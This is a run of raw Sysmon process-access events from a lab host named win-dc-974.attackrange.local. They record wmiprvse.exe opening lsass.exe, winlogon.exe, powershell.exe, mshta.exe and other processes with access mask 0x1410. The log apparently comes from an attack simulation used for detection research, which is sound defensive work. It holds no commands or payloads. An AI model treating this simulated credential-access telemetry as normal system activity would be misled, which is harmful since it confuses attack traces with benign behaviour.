22:55:39.802{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0D00-00000000AD01}620C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001696929Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.802{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0C00-00000000AD01}588C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001696928Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.802{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229D-6039-0B00-00000000AD01}852C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001696927Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.802{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229D-6039-0900-00000000AD01}792C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001696926Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.755{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7073-603D-5F88-00000000AD01}4224C:\Windows\system32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001696925Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.755{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7073-603D-5E88-00000000AD01}2712C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001696924Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.755{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7073-603D-5D88-00000000AD01}3268C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001696923Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.755{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-704C-603D-4488-00000000AD01}8476C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001696922Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.755{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7049-603D-4288-00000000AD01}6208C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001696921Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.755{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7049-603D-4188-00000000AD01}5784C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001696920Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.755{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7047-603D-4088-00000000AD01}8352C:\Windows\system32\DllHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001696919Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.755{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7010-603D-3788-00000000AD01}7668C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001696918Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.755{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6EE4-603D-1288-00000000AD01}8132C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001696917Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.755{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6EA8-603D-0988-00000000AD01}6280C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001696916Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.755{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D7C-603D-E487-00000000AD01}136C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001696915Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.755{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D40-603D-DB87-00000000AD01}8848C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001696914Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.755{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6C14-603D-B687-00000000AD01}8724C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001696913Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.755{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6BD8-603D-AD87-00000000AD01}6060C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001696912Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.755{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6AAC-603D-8787-00000000AD01}8752C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001696911Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.755{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6A70-603D-7E87-00000000AD01}3728C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001696910Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 